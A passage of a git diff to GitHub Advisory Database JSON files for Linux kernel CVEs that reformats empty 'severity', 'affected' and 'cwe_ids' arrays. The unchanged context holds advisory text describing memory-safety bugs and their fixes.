b/advisories/unreviewed/2024/05/GHSA-29rx-6chj-44xc/GHSA-29rx-6chj-44xc.json @@ -7,12 +7,8 @@ "CVE-2021-47291" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix another slab-out-of-bounds in fib6_nh_flush_exceptions\n\nWhile running the self-tests on a KASAN enabled kernel, I observed a\nslab-out-of-bounds splat very similar to the one reported in\ncommit 821bbf79fe46 (\"ipv6: Fix KASAN: slab-out-of-bounds Read in\n fib6_nh_flush_exceptions\").\n\nWe additionally need to take care of fib6_metrics initialization\nfailure when the caller provides an nh.\n\nThe fix is similar, explicitly free the route instead of calling\nfib6_info_release on a half-initialized object.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2hh5-254v-jpf4/GHSA-2hh5-254v-jpf4.json b/advisories/unreviewed/2024/05/GHSA-2hh5-254v-jpf4/GHSA-2hh5-254v-jpf4.json index 39733c70400..7e4fff9226d 100644 --- a/advisories/unreviewed/2024/05/GHSA-2hh5-254v-jpf4/GHSA-2hh5-254v-jpf4.json +++ b/advisories/unreviewed/2024/05/GHSA-2hh5-254v-jpf4/GHSA-2hh5-254v-jpf4.json @@ -7,12 +7,8 @@ "CVE-2021-47247" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix use-after-free of encap entry in neigh update handler\n\nFunction mlx5e_rep_neigh_update() wasn't updated to accommodate rtnl lock\nremoval from TC filter update path and properly handle concurrent encap\nentry insertion/deletion which can lead to following use-after-free:\n\n [23827.464923] ==================================================================\n [23827.469446] BUG: KASAN: use-after-free in mlx5e_encap_take+0x72/0x140 [mlx5_core]\n [23827.470971] Read of size 4 at addr ffff8881d132228c by task kworker/u20:6/21635\n [23827.472251]\n [23827.472615] CPU: 9 PID: 21635 Comm: kworker/u20:6 Not tainted 5.13.0-rc3+ #5\n [23827.473788] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n [23827.475639] Workqueue: mlx5e mlx5e_rep_neigh_update [mlx5_core]\n [23827.476731] Call Trace:\n [23827.477260] dump_stack+0xbb/0x107\n [23827.477906] print_address_description.constprop.0+0x18/0x140\n [23827.478896] ? mlx5e_encap_take+0x72/0x140 [mlx5_core]\n [23827.479879] ? mlx5e_encap_take+0x72/0x140 [mlx5_core]\n [23827.480905] kasan_report.cold+0x7c/0xd8\n [23827.481701] ? mlx5e_encap_take+0x72/0x140 [mlx5_core]\n [23827.482744] kasan_check_range+0x145/0x1a0\n [23827.493112] mlx5e_encap_take+0x72/0x140 [mlx5_core]\n [23827.494054] ? mlx5e_tc_tun_encap_info_equal_generic+0x140/0x140 [mlx5_core]\n [23827.495296] mlx5e_rep_neigh_update+0x41e/0x5e0 [mlx5_core]\n [23827.496338] ? mlx5e_rep_neigh_entry_release+0xb80/0xb80 [mlx5_core]\n [23827.497486] ? read_word_at_a_time+0xe/0x20\n [23827.498250] ? strscpy+0xa0/0x2a0\n [23827.498889] process_one_work+0x8ac/0x14e0\n [23827.499638] ? lockdep_hardirqs_on_prepare+0x400/0x400\n [23827.500537] ? pwq_dec_nr_in_flight+0x2c0/0x2c0\n [23827.501359] ? rwlock_bug.part.0+0x90/0x90\n [23827.502116] worker_thread+0x53b/0x1220\n [23827.502831] ? process_one_work+0x14e0/0x14e0\n [23827.503627] kthread+0x328/0x3f0\n [23827.504254] ? _raw_spin_unlock_irq+0x24/0x40\n [23827.505065] ? __kthread_bind_mask+0x90/0x90\n [23827.505912] ret_from_fork+0x1f/0x30\n [23827.506621]\n [23827.506987] Allocated by task 28248:\n [23827.507694] kasan_save_stack+0x1b/0x40\n [23827.508476] __kasan_kmalloc+0x7c/0x90\n [23827.509197] mlx5e_attach_encap+0xde1/0x1d40 [mlx5_core]\n [23827.510194] mlx5e_tc_add_fdb_flow+0x397/0xc40 [mlx5_core]\n [23827.511218] __mlx5e_add_fdb_flow+0x519/0xb30 [mlx5_core]\n [23827.512234] mlx5e_configure_flower+0x191c/0x4870 [mlx5_core]\n [23827.513298] tc_setup_cb_add+0x1d5/0x420\n [23827.514023] fl_hw_replace_filter+0x382/0x6a0 [cls_flower]\n [23827.514975] fl_change+0x2ceb/0x4a51 [cls_flower]\n [23827.515821] tc_new_tfilter+0x89a/0x2070\n [23827.516548] rtnetlink_rcv_msg+0x644/0x8c0\n [23827.517300] netlink_rcv_skb+0x11d/0x340\n [23827.518021] netlink_unicast+0x42b/0x700\n [23827.518742] netlink_sendmsg+0x743/0xc20\n [23827.519467] sock_sendmsg+0xb2/0xe0\n [23827.520131] ____sys_sendmsg+0x590/0x770\n [23827.520851] ___sys_sendmsg+0xd8/0x160\n [23827.521552] __sys_sendmsg+0xb7/0x140\n [23827.522238] do_syscall_64+0x3a/0x70\n [23827.522907] entry_SYSCALL_64_after_hwframe+0x44/0xae\n [23827.523797]\n [23827.524163] Freed by task 25948:\n [23827.524780] kasan_save_stack+0x1b/0x40\n [23827.525488] kasan_set_track+0x1c/0x30\n [23827.526187] kasan_set_free_info+0x20/0x30\n [23827.526968] __kasan_slab_free+0xed/0x130\n [23827.527709] slab_free_freelist_hook+0xcf/0x1d0\n [23827.528528] kmem_cache_free_bulk+0x33a/0x6e0\n [23827.529317] kfree_rcu_work+0x55f/0xb70\n [23827.530024] process_one_work+0x8ac/0x14e0\n [23827.530770] worker_thread+0x53b/0x1220\n [23827.531480] kthread+0x328/0x3f0\n [23827.532114] ret_from_fork+0x1f/0x30\n [23827.532785]\n [23827.533147] Last potentially related work creation:\n [23827.534007] kasan_save_stack+0x1b/0x40\n [23827.534710] kasan_record_aux_stack+0xab/0xc0\n [23827.535492] kvfree_call_rcu+0x31/0x7b0\n [23827.536206] mlx5e_tc_del\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2jv5-59rp-vmgj/GHSA-2jv5-59rp-vmgj.json b/advisories/unreviewed/2024/05/GHSA-2jv5-59rp-vmgj/GHSA-2jv5-59rp-vmgj.json index 34bb7a9e5f2..159c2d5a29f 100644 --- a/advisories/unreviewed/2024/05/GHSA-2jv5-59rp-vmgj/GHSA-2jv5-59rp-vmgj.json +++ b/advisories/unreviewed/2024/05/GHSA-2jv5-59rp-vmgj/GHSA-2jv5-59rp-vmgj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2q2v-mx9w-mg4j/GHSA-2q2v-mx9w-mg4j.json b/advisories/unreviewed/2024/05/GHSA-2q2v-mx9w-mg4j/GHSA-2q2v-mx9w-mg4j.json index 6faf63354a8..2618c103480 100644 --- a/advisories/unreviewed/2024/05/GHSA-2q2v-mx9w-mg4j/GHSA-2q2v-mx9w-mg4j.json +++ b/advisories/unreviewed/2024/05/GHSA-2q2v-mx9w-mg4j/GHSA-2q2v-mx9w-mg4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2qgr-37h8-x3w9/GHSA-2qgr-37h8-x3w9.json b/advisories/unreviewed/2024/05/GHSA-2qgr-37h8-x3w9/GHSA-2qgr-37h8-x3w9.json index 0ad547be1f1..3001b405fd3 100644 --- a/advisories/unreviewed/2024/05/GHSA-2qgr-37h8-x3w9/GHSA-2qgr-37h8-x3w9.json +++ b/advisories/unreviewed/2024/05/GHSA-2qgr-37h8-x3w9/GHSA-2qgr-37h8-x3w9.json @@ -7,12 +7,8 @@ "CVE-2021-47260" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Fix a potential NULL dereference in nfs_get_client()\n\nNone of the callers are expecting NULL returns from nfs_get_client() so\nthis code will lead to an Oops. It's better to return an error\npointer. I expect that this is dead code so hopefully no one is\naffected.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2v93-g9j3-9q9h/GHSA-2v93-g9j3-9q9h.json b/advisories/unreviewed/2024/05/GHSA-2v93-g9j3-9q9h/GHSA-2v93-g9j3-9q9h.json index b834904cbc1..8de72219552 100644 --- a/advisories/unreviewed/2024/05/GHSA-2v93-g9j3-9q9h/GHSA-2v93-g9j3-9q9h.json +++ b/advisories/unreviewed/2024/05/GHSA-2v93-g9j3-9q9h/GHSA-2v93-g9j3-9q9h.json @@ -7,12 +7,8 @@ "CVE-2021-47261" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/mlx5: Fix initializing CQ fragments buffer\n\nThe function init_cq_frag_buf() can be called to initialize the current CQ\nfragments buffer cq->buf, or the temporary cq->resize_buf that is filled\nduring CQ resize operation.\n\nHowever, the offending commit started to use function get_cqe() for\ngetting the CQEs, the issue with this change is that get_cqe() always\nreturns CQEs from cq->buf, which leads us to initialize the wrong buffer,\nand in case of enlarging the CQ we try to access elements beyond the size\nof the current cq->buf and eventually hit a kernel panic.\n\n [exception RIP: init_cq_frag_buf+103]\n [ffff9f799ddcbcd8] mlx5_ib_resize_cq at ffffffffc0835d60 [mlx5_ib]\n [ffff9f799ddcbdb0] ib_resize_cq at ffffffffc05270df [ib_core]\n [ffff9f799ddcbdc0] llt_rdma_setup_qp at ffffffffc0a6a712 [llt]\n [ffff9f799ddcbe10] llt_rdma_cc_event_action at ffffffffc0a6b411 [llt]\n [ffff9f799ddcbe98] llt_rdma_client_conn_thread at ffffffffc0a6bb75 [llt]\n [ffff9f799ddcbec8] kthread at ffffffffa66c5da1\n [ffff9f799ddcbf50] ret_from_fork_nospec_begin at ffffffffa6d95ddd\n\nFix it by getting the needed CQE by calling mlx5_frag_buf_get_wqe() that\ntakes the correct source buffer as a parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-335x-9j96-mxcr/GHSA-335x-9j96-mxcr.json b/advisories/unreviewed/2024/05/GHSA-335x-9j96-mxcr/GHSA-335x-9j96-mxcr.json index 4f97bbc75c4..f232a198bc3 100644 --- a/advisories/unreviewed/2024/05/GHSA-335x-9j96-mxcr/GHSA-335x-9j96-mxcr.json +++ b/advisories/unreviewed/2024/05/GHSA-335x-9j96-mxcr/GHSA-335x-9j96-mxcr.json @@ -7,12 +7,8 @@ "CVE-2021-47374" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma-debug: prevent an error message from causing runtime problems\n\nFor some drivers, that use the DMA API. This error message can be reached\nseveral millions of times per second, causing spam to the kernel's printk\nbuffer and bringing the CPU usage up to 100% (so, it should be rate\nlimited). However, since there is at least one driver that is in the\nmainline and suffers from the error condition, it is more useful to\nerr_printk() here instead of just rate limiting the error message (in hopes\nthat it will make it easier for other drivers that suffer from this issue\nto be spotted).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-3375-vg47-m3gm/GHSA-3375-vg47-m3gm.json b/advisories/unreviewed/2024/05/GHSA-3375-vg47-m3gm/GHSA-3375-vg47-m3gm.json index 9547ddbb369..e7a49782405 100644 --- a/advisories/unreviewed/2024/05/GHSA-3375-vg47-m3gm/GHSA-3375-vg47-m3gm.json +++ b/advisories/unreviewed/2024/05/GHSA-3375-vg47-m3gm/GHSA-3375-vg47-m3gm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-39gw-mq6q-79fw/GHSA-39gw-mq6q-79fw.json b/advisories/unreviewed/2024/05/GHSA-39gw-mq6q-79fw/GHSA-39gw-mq6q-79fw.json index 0104cac4e1f..232526c7bd9 100644 --- a/advisories/unreviewed/2024/05/GHSA-39gw-mq6q-79fw/GHSA-39gw-mq6q-79fw.json +++ b/advisories/unreviewed/2024/05/GHSA-39gw-mq6q-79fw/GHSA-39gw-mq6q-79fw.json @@ -7,12 +7,8 @@ "CVE-2021-47279" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: misc: brcmstb-usb-pinmap: check return value after calling platform_get_resource()\n\nIt will cause null-ptr-deref if platform_get_resource() returns NULL,\nwe need check the return value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-3c4w-p6cr-wgq6/GHSA-3c4w-p6cr-wgq6.json b/advisories/unreviewed/2024/05/GHSA-3c4w-p6cr-wgq6/GHSA-3c4w-p6cr-wgq6.json index b75b3469885..196b1b4233d 100644 --- a/advisories/unreviewed/2024/05/GHSA-3c4w-p6cr-wgq6/GHSA-3c4w-p6cr-wgq6.json +++ b/advisories/unreviewed/2024/05/GHSA-3c4w-p6cr-wgq6/GHSA-3c4w-p6cr-wgq6.json @@ -7,12 +7,8 @@ "CVE-2021-47221" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/slub: actually fix freelist pointer vs redzoning\n\nIt turns out that SLUB redzoning (\"slub_debug=Z\") checks from\ns->object_size rather than from s->inuse (which is normally bumped to\nmake room for the freelist pointer), so a cache created with an object\nsize less than 24 would have the freelist pointer written beyond\ns->object_size, causing the redzone to be corrupted by the freelist\npointer. This was very visible with \"slub_debug=ZF\":\n\n BUG test (Tainted: G B ): Right Redzone overwritten\n -----------------------------------------------------------------------------\n\n INFO: 0xffff957ead1c05de-0xffff957ead1c05df @offset=1502. First byte 0x1a instead of 0xbb\n INFO: Slab 0xffffef3950b47000 objects=170 used=170 fp=0x0000000000000000 flags=0x8000000000000200\n INFO: Object 0xffff957ead1c05d8 @offset=1496 fp=0xffff957ead1c0620\n\n Redzone (____ptrval____): bb bb bb bb bb bb bb bb ........\n Object (____ptrval____): 00 00 00 00 00 f6 f4 a5 ........\n Redzone (____ptrval____): 40 1d e8 1a aa @....\n Padding (____ptrval____): 00 00 00 00 00 00 00 00 ........\n\nAdjust the offset to stay within s->object_size.\n\n(Note that no caches of in this size range are known to exist in the\nkernel currently.)", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-3h24-j2vg-3wvf/GHSA-3h24-j2vg-3wvf.json b/advisories/unreviewed/2024/05/GHSA-3h24-j2vg-3wvf/GHSA-3h24-j2vg-3wvf.json index 10779dbed51..ee84c9fd954 100644 --- a/advisories/unreviewed/2024/05/GHSA-3h24-j2vg-3wvf/GHSA-3h24-j2vg-3wvf.json +++ b/advisories/unreviewed/2024/05/GHSA-3h24-j2vg-3wvf/GHSA-3h24-j2vg-3wvf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-3w59-vx6f-4274/GHSA-3w59-vx6f-4274.json b/advisories/unreviewed/2024/05/GHSA-3w59-vx6f-4274/GHSA-3w59-vx6f-4274.json index 0ad7f3ea455..05147836ba1 100644 --- a/advisories/unreviewed/2024/05/GHSA-3w59-vx6f-4274/GHSA-3w59-vx6f-4274.json +++ b/advisories/unreviewed/2024/05/GHSA-3w59-vx6f-4274/GHSA-3w59-vx6f-4274.json @@ -7,12 +7,8 @@ "CVE-2021-47236" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: cdc_eem: fix tx fixup skb leak\n\nwhen usbnet transmit a skb, eem fixup it in eem_tx_fixup(),\nif skb_copy_expand() failed, it return NULL,\nusbnet_start_xmit() will have no chance to free original skb.\n\nfix it by free orginal skb in eem_tx_fixup() first,\nthen check skb clone status, if failed, return NULL to usbnet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-3wh6-h4gj-wjr7/GHSA-3wh6-h4gj-wjr7.json b/advisories/unreviewed/2024/05/GHSA-3wh6-h4gj-wjr7/GHSA-3wh6-h4gj-wjr7.json index 995aeef4b98..8173ab49e50 100644 --- a/advisories/unreviewed/2024/05/GHSA-3wh6-h4gj-wjr7/GHSA-3wh6-h4gj-wjr7.json +++ b/advisories/unreviewed/2024/05/GHSA-3wh6-h4gj-wjr7/GHSA-3wh6-h4gj-wjr7.json @@ -7,12 +7,8 @@ "CVE-2021-47282" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: bcm2835: Fix out-of-bounds access with more than 4 slaves\n\nCommit 571e31fa60b3 (\"spi: bcm2835: Cache CS register value for\n->prepare_message()\") limited the number of slaves to 3 at compile-time.\nThe limitation was necessitated by a statically-sized array prepare_cs[]\nin the driver private data which contains a per-slave register value.\n\nThe commit sought to enforce the limitation at run-time by setting the\ncontroller's num_chipselect to 3: Slaves with a higher chipselect are\nrejected by spi_add_device().\n\nHowever the commit neglected that num_chipselect only limits the number\nof *native* chipselects. If GPIO chipselects are specified in the\ndevice tree for more than 3 slaves, num_chipselect is silently raised by\nof_spi_get_gpio_numbers() and the result are out-of-bounds accesses to\nthe statically-sized array prepare_cs[].\n\nAs a bandaid fix which is backportable to stable, raise the number of\nallowed slaves to 24 (which \"ought to be enough for anybody\"), enforce\nthe limitation on slave ->setup and revert num_chipselect to 3 (which is\nthe number of native chipselects supported by the controller).\nAn upcoming for-next commit will allow an arbitrary number of slaves.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-4433-jwm9-48r5/GHSA-4433-jwm9-48r5.json b/advisories/unreviewed/2024/05/GHSA-4433-jwm9-48r5/GHSA-4433-jwm9-48r5.json index 0b0db617e05..857c78c9308 100644 --- a/advisories/unreviewed/2024/05/GHSA-4433-jwm9-48r5/GHSA-4433-jwm9-48r5.json +++ b/advisories/unreviewed/2024/05/GHSA-4433-jwm9-48r5/GHSA-4433-jwm9-48r5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-482h-984g-m9qw/GHSA-482h-984g-m9qw.json b/advisories/unreviewed/2024/05/GHSA-482h-984g-m9qw/GHSA-482h-984g-m9qw.json index 627b524f563..46ff0a27047 100644 --- a/advisories/unreviewed/2024/05/GHSA-482h-984g-m9qw/GHSA-482h-984g-m9qw.json +++ b/advisories/unreviewed/2024/05/GHSA-482h-984g-m9qw/GHSA-482h-984g-m9qw.json @@ -7,12 +7,8 @@ "CVE-2021-47298" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Fix potential memory leak on unlikely error case\n\nIf skb_linearize is needed and fails we could leak a msg on the error\nhandling. To fix ensure we kfree the msg block before returning error.\nFound during code review.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-4h6j-2wpq-2xv2/GHSA-4h6j-2wpq-2xv2.json b/advisories/unreviewed/2024/05/GHSA-4h6j-2wpq-2xv2/GHSA-4h6j-2wpq-2xv2.json index 4f588722069..97551b44d15 100644 --- a/advisories/unreviewed/2024/05/GHSA-4h6j-2wpq-2xv2/GHSA-4h6j-2wpq-2xv2.json +++ b/advisories/unreviewed/2024/05/GHSA-4h6j-2wpq-2xv2/GHSA-4h6j-2wpq-2xv2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-4mwj-7h55-4fvc/GHSA-4mwj-7h55-4fvc.json b/advisories/unreviewed/2024/05/GHSA-4mwj-7h55-4fvc/GHSA-4mwj-7h55-4fvc.json index 647f44aaf0b..98dddb77604 100644 --- a/advisories/unreviewed/2024/05/GHSA-4mwj-7h55-4fvc/GHSA-4mwj-7h55-4fvc.json +++ b/advisories/unreviewed/2024/05/GHSA-4mwj-7h55-4fvc/GHSA-4mwj-7h55-4fvc.json @@ -7,12 +7,8 @@ "CVE-2021-47263" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: wcd934x: Fix shift-out-of-bounds error\n\nbit-mask for pins 0 to 4 is BIT(0) to BIT(4) however we ended up with BIT(n - 1)\nwhich is not right, and this was caught by below usban check\n\nUBSAN: shift-out-of-bounds in drivers/gpio/gpio-wcd934x.c:34:14", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-4xq8-m4f5-h82h/GHSA-4xq8-m4f5-h82h.json b/advisories/unreviewed/2024/05/GHSA-4xq8-m4f5-h82h/GHSA-4xq8-m4f5-h82h.json index 37e08f4be3e..ffe7d7e78d2 100644 --- a/advisories/unreviewed/2024/05/GHSA-4xq8-m4f5-h82h/GHSA-4xq8-m4f5-h82h.json +++ b/advisories/unreviewed/2024/05/GHSA-4xq8-m4f5-h82h/GHSA-4xq8-m4f5-h82h.json @@ -7,12 +7,8 @@ "CVE-2021-47270" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: fix various gadgets null ptr deref on 10gbps cabling.\n\nThis avoids a null pointer dereference in\nf_{ecm,eem,hid,loopback,printer,rndis,serial,sourcesink,subset,tcm}\nby simply reusing the 5gbps config for 10gbps.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-52m3-99g2-f396/GHSA-52m3-99g2-f396.json b/advisories/unreviewed/2024/05/GHSA-52m3-99g2-f396/GHSA-52m3-99g2-f396.json index 70407621be7..8bb2cec463d 100644 --- a/advisories/unreviewed/2024/05/GHSA-52m3-99g2-f396/GHSA-52m3-99g2-f396.json +++ b/advisories/unreviewed/2024/05/GHSA-52m3-99g2-f396/GHSA-52m3-99g2-f396.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-6239-6f98-f8vf/GHSA-6239-6f98-f8vf.json b/advisories/unreviewed/2024/05/GHSA-6239-6f98-f8vf/GHSA-6239-6f98-f8vf.json index 8e0e1ac95e9..979ece664a2 100644 --- a/advisories/unreviewed/2024/05/GHSA-6239-6f98-f8vf/GHSA-6239-6f98-f8vf.json +++ b/advisories/unreviewed/2024/05/GHSA-6239-6f98-f8vf/GHSA-6239-6f98-f8vf.json @@ -7,12 +7,8 @@ "CVE-2021-47277" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nkvm: avoid speculation-based attacks from out-of-range memslot accesses\n\nKVM's mechanism for accessing guest memory translates a guest physical\naddress (gpa) to a host virtual address using the right-shifted gpa\n(also known as gfn) and a struct kvm_memory_slot. The translation is\nperformed in __gfn_to_hva_memslot using the following formula:\n\n hva = slot->userspace_addr + (gfn - slot->base_gfn) * PAGE_SIZE\n\nIt is expected that gfn falls within the boundaries of the guest's\nphysical memory. However, a guest can access invalid physical addresses\nin such a way that the gfn is invalid.\n\n__gfn_to_hva_memslot is called from kvm_vcpu_gfn_to_hva_prot, which first\nretrieves a memslot through __gfn_to_memslot. While __gfn_to_memslot\ndoes check that the gfn falls within the boundaries of the guest's\nphysical memory or not, a CPU can speculate the result of the check and\ncontinue execution speculatively using an illegal gfn. The speculation\ncan result in calculating an out-of-bounds hva. If the resulting host\nvirtual address is used to load another guest physical address, this\nis effectively a Spectre gadget consisting of two consecutive reads,\nthe second of which is data dependent on the first.\n\nRight now it's not clear if there are any cases in which this is\nexploitable. One interesting case was reported by the original author\nof this patch, and involves visiting guest page tables on x86. Right\nnow these are not vulnerable because the hva read goes through get_user(),\nwhich contains an LFENCE speculation barrier. However, there are\npatches in progress for x86 uaccess.h to mask kernel addresses instead of\nusing LFENCE; once these land, a guest could use speculation to read\nfrom the VMM's ring 3 address space. Other architectures such as ARM\nalready use the address masking method, and would be susceptible to\nthis same kind of data-dependent access gadgets. Therefore, this patch\nproactively protects from these attacks by masking out-of-bounds gfns\nin __gfn_to_hva_memslot, which blocks speculation of invalid hvas.\n\nSean Christopherson noted that this patch does not cover\nkvm_read_guest_offset_cached. This however is limited to a few bytes\npast the end of the cache, and therefore it is unlikely to be useful in\nthe context of building a chain of data dependent accesses.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-6h98-v544-xj7q/GHSA-6h98-v544-xj7q.json b/advisories/unreviewed/2024/05/GHSA-6h98-v544-xj7q/GHSA-6h98-v544-xj7q.json index c6786268eb7..62ff1b6214e 100644 --- a/advisories/unreviewed/2024/05/GHSA-6h98-v544-xj7q/GHSA-6h98-v544-xj7q.json +++ b/advisories/unreviewed/2024/05/GHSA-6h98-v544-xj7q/GHSA-6h98-v544-xj7q.json @@ -7,12 +7,8 @@ "CVE-2021-47240" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qrtr: fix OOB Read in qrtr_endpoint_post\n\nSyzbot reported slab-out-of-bounds Read in\nqrtr_endpoint_post. The problem was in wrong\n_size_ type:\n\n\tif (len != ALIGN(size, 4) + hdrlen)\n\t\tgoto err;\n\nIf size from qrtr_hdr is 4294967293 (0xfffffffd), the result of\nALIGN(size, 4) will be 0. In case of len == hdrlen and size == 4294967293\nin header this check won't fail and\n\n\tskb_put_data(skb, data + hdrlen, size);\n\nwill read out of bound from data, which is hdrlen allocated block.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git 